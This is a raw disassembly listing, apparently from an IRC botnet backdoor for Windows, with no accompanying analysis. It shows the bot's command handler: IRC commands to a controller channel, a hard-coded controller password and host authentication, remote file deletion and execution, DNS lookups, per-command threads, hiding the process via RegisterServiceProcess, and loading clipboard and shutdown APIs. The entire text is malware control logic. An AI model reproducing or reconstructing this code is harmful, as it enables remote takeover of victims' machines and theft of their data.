loc_409229: ; CODE XREF: sub_401CC7+74D2�j
; sub_401CC7+7546�j
push offset aVideo ; "video"
push [ebp+Source] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz loc_4089D4
mov eax, [ebp+esi+Format]
cmp eax, ebx
mov [ebp+arg_1C], eax
jz short loc_4092C1
mov eax, [ebp+esi+Str2]
cmp eax, ebx
mov [ebp+Src], eax
jz short loc_4092C1
mov eax, [ebp+esi+var_80]
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_4092C1
mov edi, [ebp+esi+var_7C]
cmp edi, ebx
jz short loc_4092C1
mov esi, [ebp+esi+var_78]
cmp esi, ebx
jz short loc_4092C1
push esi ; Str
call _atoi
pop ecx
push eax ; int
push edi ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+arg_18] ; Str
call _atoi
pop ecx
push eax ; int
push [ebp+Src] ; Str
call _atoi
pop ecx
push eax ; Size
push [ebp+arg_1C] ; int
call sub_416352
add esp, 14h
test eax, eax
jnz short loc_4092B7
push [ebp+arg_1C]
push offset unk_44253C
jmp loc_4089C5
; ---------------------------------------------------------------------------
loc_4092B7: ; CODE XREF: sub_401CC7+75E1�j
push offset unk_442568
jmp loc_409385
; ---------------------------------------------------------------------------
loc_4092C1: ; CODE XREF: sub_401CC7+7585�j
; sub_401CC7+7593�j ...
push offset unk_4425A8
jmp loc_409385
; ---------------------------------------------------------------------------
loc_4092CB: ; CODE XREF: sub_401CC7+403B�j
; sub_401CC7+4050�j
push offset aR_0 ; "r"
push [ebp+Source] ; Filename
call _fopen
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
jz short loc_40933B
mov esi, 200h
push edi
lea eax, [ebp+Dst]
push esi
push eax
call sub_41F210
add esp, 0Ch
loc_4092F6: ; CODE XREF: sub_401CC7+765E�j
test eax, eax
jz short loc_409327
push 1 ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
push edi
lea eax, [ebp+Dst]
push esi
push eax
call sub_41F210
add esp, 20h
jmp short loc_4092F6
; ---------------------------------------------------------------------------
loc_409327: ; CODE XREF: sub_401CC7+7631�j
push edi ; File
call _fclose
pop ecx
push [ebp+Source]
push offset unk_441D94
jmp loc_4094C9
; ---------------------------------------------------------------------------
loc_40933B: ; CODE XREF: sub_401CC7+7617�j
push [ebp+Source]
push offset unk_441DB8
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_409348: ; CODE XREF: sub_401CC7+4011�j
; sub_401CC7+4026�j
cmp [ebp+var_C], ebx
jz loc_409B16
push [ebp+Source] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409B16
push offset asc_441D38 ; "\n"
push esi ; Dest
call _strcat
push esi ; Str
call sub_41A931
add esp, 0Ch
test eax, eax
jnz short loc_409398
push offset asc_441D3C ; "-"
loc_409385: ; CODE XREF: sub_401CC7+75F5�j
; sub_401CC7+75FF�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_4089D4
; ---------------------------------------------------------------------------
loc_409398: ; CODE XREF: sub_401CC7+76B7�j
push esi
lea eax, [ebp+Dst]
push offset asc_441D68 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_4089F5
; ---------------------------------------------------------------------------
loc_4093B2: ; CODE XREF: sub_401CC7+3FE7�j
; sub_401CC7+3FFC�j
cmp [ebp+var_C], ebx
jz loc_409B16
push [ebp+Source] ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz loc_409B16
push eax ; Format
call sub_418F2A
test eax, eax
pop ecx
jnz short loc_4093E2
push offset unk_441CF4
jmp short loc_409385
; ---------------------------------------------------------------------------
loc_4093E2: ; CODE XREF: sub_401CC7+7712�j
push offset dword_441D14
jmp short loc_409385
; ---------------------------------------------------------------------------
loc_4093E9: ; CODE XREF: sub_401CC7+3FBD�j
; sub_401CC7+3FD2�j
push 7Fh ; Count
lea eax, [ebp+var_2080]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
mov esi, [ebp+esi+Format]
add esp, 0Ch
cmp esi, ebx
jz short loc_40941A
push 7Fh ; Count
lea eax, [ebp+var_2000]
push esi ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_40941A: ; CODE XREF: sub_401CC7+773F�j
push 7Fh ; Count
lea eax, [ebp+var_1F80]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_2084], eax
mov eax, [ebp+var_8]
push [ebp+Source]
mov [ebp+var_1EFC], eax
mov eax, [ebp+var_4]
mov [ebp+var_1EF8], eax
lea eax, [ebp+Dst]
push offset asc_441C8C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Ch ; int
push eax ; Source
call sub_40B756
add esp, 18h
mov [ebp+var_1F00], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2084]
push ebx
push eax
push offset sub_41BCA5
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1F00]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_4094BD
loc_4094A7: ; CODE XREF: sub_401CC7+77F4�j
cmp [ebp+var_1EF4], ebx
jnz loc_406F7A
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4094A7
; ---------------------------------------------------------------------------
loc_4094BD: ; CODE XREF: sub_401CC7+77DE�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset asc_441CA4 ; "-"
loc_4094C9: ; CODE XREF: sub_401CC7+29BF�j
; sub_401CC7+766F�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_406F7A
; ---------------------------------------------------------------------------
loc_4094DD: ; CODE XREF: sub_401CC7+3F93�j
; sub_401CC7+3FA8�j
push ebx ; Source
push [ebp+Format] ; int
push [ebp+arg_4] ; int
push [ebp+Source] ; Str
call sub_4103EB
add esp, 10h
push [ebp+Source]
push offset dword_441C68
jmp loc_409B0F
; ---------------------------------------------------------------------------
loc_4094FF: ; CODE XREF: sub_401CC7+3F69�j
; sub_401CC7+3F7E�j
push 14h ; Size
lea eax, [ebp+var_1D48]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+var_1D34]
push [ebp+Source]
push offset aS_33 ; "%s"
push eax ; Dest
call _sprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_1D50], eax
lea eax, [ebp+var_C0]
push eax ; Format
lea eax, [ebp+var_1C30]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1BA8], eax
mov eax, [ebp+var_8]
mov [ebp+var_1BA4], eax
lea eax, [ebp+var_1C30]
push eax
lea eax, [ebp+var_1D34]
push eax
lea eax, [ebp+Dst]
push offset asc_441BFC ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Ah ; int
push eax ; Source
call sub_40B756
add esp, 1Ch
mov [ebp+var_1BAC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1D50]
push ebx
push eax
push offset sub_416980
push ebx
push ebx
call ds:dword_4F5350 ; CreateThread
mov ecx, [ebp+var_1BAC]
imul ecx, 234h
cmp eax, ebx
mov dword_45602C[ecx], eax
jz short loc_4095DA
loc_4095C4: ; CODE XREF: sub_401CC7+7911�j
cmp [ebp+var_1BA0], ebx
jnz loc_408637
push 32h
call ds:dword_4F534C ; Sleep
jmp short loc_4095C4
; ---------------------------------------------------------------------------
loc_4095DA: ; CODE XREF: sub_401CC7+78FB�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
push offset unk_441C20
jmp loc_408628
; ---------------------------------------------------------------------------
loc_4095EB: ; CODE XREF: sub_401CC7+3F3F�j
; sub_401CC7+3F54�j
push [ebp+Source]
call ds:dword_4F5354 ; DeleteFileA
test eax, eax
jz short loc_409616
push [ebp+Source]
lea eax, [ebp+Dst]
push offset asc_441BC8 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
jmp loc_4096F4
; ---------------------------------------------------------------------------
loc_409616: ; CODE XREF: sub_401CC7+792F�j
push offset dword_441BE4
call sub_418E65
pop ecx
push eax
jmp loc_404132
; ---------------------------------------------------------------------------
loc_409627: ; CODE XREF: sub_401CC7+3F15�j
; sub_401CC7+3F2A�j
push [ebp+Source] ; Str
call _atoi
push eax
call sub_41A8AA
pop ecx
pop ecx
push 1
pop esi
push [ebp+Source]
cmp eax, esi
jnz short loc_409648
push offset unk_441B68
jmp short loc_40964D
; ---------------------------------------------------------------------------
loc_409648: ; CODE XREF: sub_401CC7+7978�j
push offset asc_441B8C ; "-"
loc_40964D: ; CODE XREF: sub_401CC7+797F�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_406F7D
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
jmp loc_406F7D
; ---------------------------------------------------------------------------
loc_409686: ; CODE XREF: sub_401CC7+3EEB�j
; sub_401CC7+3F00�j
push ebx ; int
push ebx ; int
push [ebp+Source] ; Str2
push [ebp+var_4] ; int
push ebx ; Str
push [ebp+arg_4] ; int
call sub_41A589
add esp, 18h
cmp eax, 1
push [ebp+Source]
jnz short loc_4096AC
push offset unk_441B0C
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_4096AC: ; CODE XREF: sub_401CC7+79D9�j
push offset unk_441B2C
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_4096B6: ; CODE XREF: sub_401CC7+3EC1�j
; sub_401CC7+3ED6�j
mov esi, [ebp+Source]
push esi
call dword_4E3138 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+var_2D4], eax
jz short loc_4096FC
push 2
lea eax, [ebp+var_2D4]
push 4
push eax
call dword_4E30B0 ; gethostbyaddr
cmp eax, ebx
jz short loc_40971D
push dword ptr [eax]
push esi
push offset asc_441A94 ; "-"
loc_4096E8: ; CODE XREF: sub_401CC7+7A54�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
loc_4096F4: ; CODE XREF: sub_401CC7+794A�j
add esp, 10h
jmp loc_406F59
; ---------------------------------------------------------------------------
loc_4096FC: ; CODE XREF: sub_401CC7+7A02�j
push esi
call dword_4E317C ; gethostbyname
cmp eax, ebx
jz short loc_40971D
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_4E3184 ; inet_ntoa
push eax
push esi
push offset unk_441AB4
jmp short loc_4096E8
; ---------------------------------------------------------------------------
loc_40971D: ; CODE XREF: sub_401CC7+7A17�j
; sub_401CC7+7A3E�j
push offset unk_441AD4
jmp loc_408850
; ---------------------------------------------------------------------------
loc_409727: ; CODE XREF: sub_401CC7+3E97�j
; sub_401CC7+3EAC�j
push 7Fh ; Count
push [ebp+Source] ; Source
push [ebp+arg_14] ; Dest
call _strncpy
add esp, 0Ch
push [ebp+Source]
push offset unk_441A64
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_409744: ; CODE XREF: sub_401CC7+3E6D�j
; sub_401CC7+3E82�j
push 5
push ebx
push ebx
push [ebp+Source]
push offset aOpen_1 ; "open"
push ebx
call dword_4E3064
push [ebp+Source]
test eax, eax
jz short loc_409768
push offset unk_441A14
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_409768: ; CODE XREF: sub_401CC7+7A95�j
push offset unk_441A34
jmp loc_406F4A
; ---------------------------------------------------------------------------
loc_409772: ; CODE XREF: sub_401CC7+3E43�j
; sub_401CC7+3E58�j
mov eax, [ebp+Source]
mov cl, [eax]
mov byte_43F094, cl
movsx eax, byte ptr [eax]
push eax
push offset unk_4419D8
jmp loc_404BD6
; ---------------------------------------------------------------------------
loc_40978B: ; CODE XREF: sub_401CC7+3E19�j
; sub_401CC7+3E2E�j
push [ebp+Source] ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409B16
push [ebp+Source] ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409B16
push ebx ; Str1
push ebx ; int
lea eax, [ebp+SubStr]
push 2 ; int
push eax ; Dest
call sub_40B44F
add esp, 10h
push eax
lea eax, [ebp+Dst]
push offset aNickS_6 ; "NICK %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
push offset aS_19 ; "%s\r\n"
jmp loc_408C1B
; ---------------------------------------------------------------------------
loc_4097E9: ; CODE XREF: sub_401CC7+3DEF�j
; sub_401CC7+3E04�j
mov esi, [ebp+Source]
push esi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_402085
push esi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_402085
push offset aQuitLater_0 ; "QUIT :later\r\n"
push esi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_456024[eax] ; int
call sub_409CEE
pop ecx
pop ecx
push 1F4h
call ds:dword_4F534C ; Sleep
push esi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_456024[eax]
call dword_4E3190 ; closesocket
push [ebp+var_10]
push esi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_45602C[eax]
call ds:dword_4F5380 ; TerminateThread
push esi ; Str
call _atoi
imul eax, 234h
push esi ; Str
mov dword_45602C[eax], ebx
call _atoi
imul eax, 234h
pop ecx
pop ecx
mov byte ptr dword_455E18[eax], bl
jmp loc_402085
; ---------------------------------------------------------------------------
loc_409897: ; CODE XREF: sub_401CC7+3DC5�j
; sub_401CC7+3DDA�j
push [ebp+Source] ; Str2
push offset aAll ; "all"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_409903
call sub_40B91F
cmp eax, ebx
jle short loc_4098BE
push eax
push offset unk_4418EC
jmp loc_408F7E
; ---------------------------------------------------------------------------
loc_4098BE: ; CODE XREF: sub_401CC7+7BEA�j
push offset asc_441914 ; "-"
loc_4098C3: ; CODE XREF: sub_401CC7+24EA�j
; sub_401CC7+2509�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4098D1: ; CODE XREF: sub_401CC7+72C6�j
cmp [ebp+var_8], ebx
jnz short loc_4098F2
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
loc_4098EA: ; CODE XREF: sub_401CC7+6E35�j
call sub_409D34
add esp, 14h
loc_4098F2: ; CODE XREF: sub_401CC7+26E7�j
; sub_401CC7+2712�j ...
lea eax, [ebp+Dst]
push eax
call sub_415C3F
jmp loc_40226F
; ---------------------------------------------------------------------------
loc_409903: ; CODE XREF: sub_401CC7+7BE1�j
mov eax, [ebp+var_A4]
lea edi, [eax+1]
cmp edi, 20h
jnb loc_402085
lea eax, [ebp+edi*4+var_90]
mov [ebp+File], eax
loc_40991F: ; CODE XREF: sub_401CC7+7CC9�j
mov eax, [ebp+File]
mov esi, [eax]
cmp esi, ebx
jz loc_402085
push esi ; Str
call _atoi
push eax
call sub_40B891
pop ecx
pop ecx
test eax, eax
push esi
jz short loc_409946
push offset unk_44193C
jmp short loc_40994B
; ---------------------------------------------------------------------------
loc_409946: ; CODE XREF: sub_401CC7+7C76�j
push offset asc_441960 ; "-"
loc_40994B: ; CODE XREF: sub_401CC7+7C7D�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40997B
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
loc_40997B: ; CODE XREF: sub_401CC7+7C96�j
lea eax, [ebp+Dst]
push eax
call sub_415C3F
add [ebp+File], 4
inc edi
cmp edi, 20h
pop ecx
jb short loc_40991F
jmp loc_402085
; ---------------------------------------------------------------------------
loc_409997: ; CODE XREF: sub_401CC7+3D9B�j
; sub_401CC7+3DB0�j
cmp [ebp+var_C], ebx
jz loc_409B16
push [ebp+Source] ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_409B16
push esi ; Args
push offset aS_20 ; "%s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 0Ch
push esi
push offset dword_4418BC
jmp loc_409B0F
; ---------------------------------------------------------------------------
loc_4099D3: ; CODE XREF: sub_401CC7+3D71�j
; sub_401CC7+3D86�j
push [ebp+Source] ; Args
push offset aPartS_2 ; "PART %s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 0Ch
push [ebp+Source]
push offset unk_441888
jmp loc_409B0F
; ---------------------------------------------------------------------------
loc_4099F3: ; CODE XREF: sub_401CC7+3D47�j
; sub_401CC7+3D5C�j
push [ebp+esi+Format]
push [ebp+Source] ; Args
push offset aJoinSS_3 ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 10h
push [ebp+Source]
push offset unk_44184C
jmp loc_409B0F
; ---------------------------------------------------------------------------
loc_409A1A: ; CODE XREF: sub_401CC7+3D1D�j
; sub_401CC7+3D32�j
push [ebp+Source] ; Args
push offset aNickS_7 ; "NICK %s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 0Ch
push [ebp+Source]
push offset unk_44180C
jmp loc_409B0F
; ---------------------------------------------------------------------------
loc_409A3A: ; CODE XREF: sub_401CC7+315D�j
; sub_401CC7+3172�j
push offset aQuitReconnec_0 ; "QUIT :reconnecting\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
pop ecx
lea eax, [ebp+Dst]
pop ecx
push [ebp+Source]
push offset asc_44149C ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_415C3F
push [ebp+Source] ; Str
call _atoi
add esp, 14h
loc_409A74: ; CODE XREF: sub_401CC7+7DFB�j
push eax
call ds:dword_4F534C ; Sleep
loc_409A7B: ; CODE XREF: sub_401CC7+2A93�j
xor eax, eax
jmp loc_402088
; ---------------------------------------------------------------------------
loc_409A82: ; CODE XREF: sub_401CC7+3133�j
; sub_401CC7+3148�j
push offset aQuitReconnec_1 ; "QUIT :reconnecting\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
pop ecx
lea eax, [ebp+Dst]
pop ecx
push [ebp+Source]
push offset asc_441444 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dst]
push eax
call sub_415C3F
push [ebp+Source] ; Str
call _atoi
add esp, 14h
imul eax, 3E8h
jmp short loc_409A74
; ---------------------------------------------------------------------------
loc_409AC4: ; CODE XREF: sub_401CC7+EB9�j
; sub_401CC7+ECE�j
push dword ptr [ebp+esi+Args] ; Str1
xor eax, eax
cmp [ebp+var_8F0], bl
setnz al
push eax ; int
lea eax, [ebp+Str1]
push dword_43F09C ; int
push eax ; Dest
call sub_40B44F
add esp, 10h
lea eax, [ebp+Str1]
push eax ; Args
push offset aNickS_8 ; "NICK %s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 0Ch
lea eax, [ebp+Str1]
push eax ; Args
push offset asc_4400A4 ; "-"
loc_409B0F: ; CODE XREF: sub_401CC7+715D�j
; sub_401CC7+7833�j ...
call sub_415CB3
pop ecx
loc_409B15: ; CODE XREF: sub_401CC7+6D3A�j
pop ecx
loc_409B16: ; CODE XREF: sub_401CC7+640�j
; sub_401CC7+64C�j ...
mov eax, [ebp+File]
jmp loc_402088
; ---------------------------------------------------------------------------
loc_409B1E: ; CODE XREF: sub_401CC7+A9C�j
; sub_401CC7+AB1�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
mov [ebp+Source], esi
jz loc_402085
cmp [ebp+var_A8], ebx
jnz loc_402085
push offset asc_43FEE8 ; "!"
push [ebp+var_90] ; Str
call _strtok
mov esi, eax
push offset byte_4E2F98 ; Delim
push ebx ; Str
inc esi
call _strtok
push offset asc_43FEEC ; "~"
push eax ; Str
call _strtok
push [ebp+Source] ; Str2
mov edi, eax
push offset a3zef ; "3zef"
call _strcmp
add esp, 20h
test eax, eax
jz short loc_409BBD
lea eax, [ebp+var_C0]
push edi
push eax
lea eax, [ebp+var_C0]
push eax ; Args
push offset aNoticeSPassAut ; "NOTICE %s :Pass auth failed (%s!%s).\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 14h
lea eax, [ebp+var_C0]
push eax ; Args
push offset aNoticeSYourAtt ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 0Ch
push edi
push esi
push offset unk_43FF44
jmp loc_4025EC
; ---------------------------------------------------------------------------
loc_409BBD: ; CODE XREF: sub_401CC7+7EB2�j
mov [ebp+File], offset off_43F158
loc_409BC4: ; CODE XREF: sub_401CC7+7F19�j
mov eax, [ebp+File]
push edi
push dword ptr [eax]
call sub_40BAAF
pop ecx
test eax, eax
pop ecx
jnz short loc_409C24
add [ebp+File], 4
cmp [ebp+File], offset off_43F15C
jb short loc_409BC4
lea eax, [ebp+var_C0]
push edi
push eax
lea eax, [ebp+var_C0]
push eax ; Args
push offset aNoticeSHostAut ; "NOTICE %s :Host Auth failed (%s!%s).\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 14h
lea eax, [ebp+var_C0]
push eax ; Args
push offset aNoticeSYourA_0 ; "NOTICE %s :Your attempt has been logged"...
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 0Ch
push edi
push esi
push offset unk_43FFC4
jmp loc_4025EC
; ---------------------------------------------------------------------------
loc_409C24: ; CODE XREF: sub_401CC7+7F0C�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_409C29: ; CODE XREF: sub_401CC7+7F8C�j
cmp [ebp+Source], ebx
jz loc_402085
cmp [edi], bl
jnz short loc_409C49
push [ebp+Source] ; Str2
push offset a3zef ; "3zef"
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_409C5A
loc_409C49: ; CODE XREF: sub_401CC7+7F6D�j
inc esi
add edi, 80h
cmp esi, 3
jl short loc_409C29
jmp loc_402085
; ---------------------------------------------------------------------------
loc_409C5A: ; CODE XREF: sub_401CC7+7F80�j
shl esi, 7
add esi, [ebp+arg_18]
lea eax, [ebp+var_E00]
push 7Fh ; Count
push eax ; Source
push esi ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_409C91
push ebx ; int
push [ebp+var_4] ; int
push offset unk_43FFF0 ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409D34
add esp, 14h
loc_409C91: ; CODE XREF: sub_401CC7+7FAE�j
lea eax, [ebp+var_C0]
push eax
push offset unk_440010
jmp loc_402269
; ---------------------------------------------------------------------------
loc_409CA2: ; CODE XREF: sub_401CC7+205�j
; sub_401CC7+21A�j
push [ebp+Source] ; Args
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 0Ch
push offset aXI ; "-x+i"
push [ebp+Source] ; Args
push offset aModeSS_0 ; "MODE %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 10h
push [ebp+arg_C]
push [ebp+arg_8] ; Args
push offset aJoinSS_4 ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_409CEE
add esp, 10h
mov dword_4E2F88, edi
jmp loc_401F5B
sub_401CC7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_409CEE(int,char *Format,char Args)
sub_409CEE proc near ; CODE XREF: sub_401B4F+3D�p
; sub_401CC7+1C2�p ...
Dest = byte ptr -200h
arg_0 = dword ptr 8
Format = dword ptr 0Ch
Args = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
lea eax, [ebp+Args]
push eax ; Args
lea eax, [ebp+Dest]
push [ebp+Format] ; Format
push 200h ; Count
push eax ; Dest
call __vsnprintf
add esp, 10h
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4E3148 ; send
leave
retn
sub_409CEE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_409D34(int,char *Str,int,int,int)
sub_409D34 proc near ; CODE XREF: sub_401CC7+50F�p
; sub_401CC7+136E�p ...
var_400 = byte ptr -400h
Dest = byte ptr -200h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 400h
cmp [ebp+arg_C], 0
push esi
push edi
mov edi, offset aNotice_3 ; "NOTICE"
jnz short loc_409D4F
mov edi, offset aPrivmsg_2 ; "PRIVMSG"
loc_409D4F: ; CODE XREF: sub_409D34+14�j
push edi ; Str
call _strlen
push [ebp+Str] ; Str
mov esi, 1FAh
sub esi, eax
call _strlen
pop ecx
sub esi, eax
pop ecx
lea eax, [ebp+var_400]
push [ebp+arg_8]
push offset aS_21 ; "%s"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+Dest]
push [ebp+Str]
push edi
push offset aSSS_1 ; "%s %s :%s\r\n"
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Dest]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Dest]
push eax
push [ebp+arg_0]
call dword_4E3148 ; send
cmp [ebp+arg_10], 0
pop edi
pop esi
jz short locret_409DD2
push 7D0h
call ds:dword_4F534C ; Sleep
locret_409DD2: ; CODE XREF: sub_409D34+91�j
leave
retn
sub_409D34 endp
; =============== S U B R O U T I N E =======================================
sub_409DD4 proc near ; CODE XREF: WinMain(x,x,x,x)+4B�p
push ebx
push ebp
mov ebp, ds:dword_4F5370
push esi
push edi
push offset aKernel32_dll ; "kernel32.dll"
call ebp ; GetModuleHandleA
mov esi, ds:dword_4F5390
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz loc_409EF4
push offset aSeterrormode ; "SetErrorMode"
push edi
call esi ; GetProcAddress
push offset aCreatetoolhelp ; "CreateToolhelp32Snapshot"
push edi
mov dword_4E31A4, eax
call esi ; GetProcAddress
push offset aProcess32first ; "Process32First"
push edi
mov dword_4E3118, eax
call esi ; GetProcAddress
push offset aProcess32next ; "Process32Next"
push edi
mov dword_4E30FC, eax
call esi ; GetProcAddress
push offset aModule32first ; "Module32First"
push edi
mov dword_4E300C, eax
call esi ; GetProcAddress
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push edi
mov dword_4E2FB8, eax
call esi ; GetProcAddress
push offset aGetlogicaldriv ; "GetLogicalDriveStringsA"
push edi
mov dword_4E2FE8, eax
call esi ; GetProcAddress
push offset aGetdrivetypea ; "GetDriveTypeA"
push edi
mov dword_4E3060, eax
call esi ; GetProcAddress
push offset aSearchpatha ; "SearchPathA"
push edi
mov dword_4E3158, eax
call esi ; GetProcAddress
push offset aQueryperforman ; "QueryPerformanceCounter"
push edi
mov dword_4E31B4, eax
call esi ; GetProcAddress
push offset aQueryperform_0 ; "QueryPerformanceFrequency"
push edi
mov dword_4E3018, eax
call esi ; GetProcAddress
cmp dword_4E31A4, ebx
mov dword_4E3000, eax
jz short loc_409ED2
cmp dword_4E3118, ebx
jz short loc_409ED2
cmp dword_4E30FC, ebx
jz short loc_409ED2
cmp dword_4E300C, ebx
jz short loc_409ED2
cmp dword_4E2FE8, ebx
jz short loc_409ED2
cmp dword_4E3060, ebx
jz short loc_409ED2
cmp dword_4E3158, ebx
jz short loc_409ED2
cmp dword_4E31B4, ebx
jz short loc_409ED2
cmp dword_4E3018, ebx
jz short loc_409ED2
cmp eax, ebx
jnz short loc_409EDC
loc_409ED2: ; CODE XREF: sub_409DD4+B8�j
; sub_409DD4+C0�j ...
mov dword_4E31B8, 1
loc_409EDC: ; CODE XREF: sub_409DD4+FC�j
push offset aRegisterservic ; "RegisterServiceProcess"
push edi
call esi ; GetProcAddress
cmp eax, ebx
mov dword_4E3130, eax
jz short loc_409F09
push 1
push ebx
call eax
jmp short loc_409F09
; ---------------------------------------------------------------------------
loc_409EF4: ; CODE XREF: sub_409DD4+1D�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov dword_4E31BC, eax
mov dword_4E31B8, 1
loc_409F09: ; CODE XREF: sub_409DD4+117�j
; sub_409DD4+11E�j
push offset aUser32_dll ; "user32.dll"
call ds:dword_4F538C ; LoadLibraryA
mov edi, eax
cmp edi, ebx
jz loc_40A01E
push offset aSendmessagea ; "SendMessageA"
push edi
call esi ; GetProcAddress
push offset aFindwindowa ; "FindWindowA"
push edi
mov dword_4E3154, eax
call esi ; GetProcAddress
push offset aIswindow ; "IsWindow"
push edi
mov dword_4E3104, eax
call esi ; GetProcAddress
push offset aDestroywindow ; "DestroyWindow"
push edi
mov dword_4E3098, eax
call esi ; GetProcAddress
push offset aOpenclipboard ; "OpenClipboard"
push edi
mov dword_4E31A8, eax
call esi ; GetProcAddress
push offset aGetclipboardda ; "GetClipboardData"
push edi
mov dword_4E30C8, eax
call esi ; GetProcAddress
push offset aCloseclipboard ; "CloseClipboard"
push edi
mov dword_4E30E8, eax
call esi ; GetProcAddress
push offset aExitwindowsex ; "ExitWindowsEx"
push edi
mov dword_4E314C, eax
call esi ; GetProcAddress
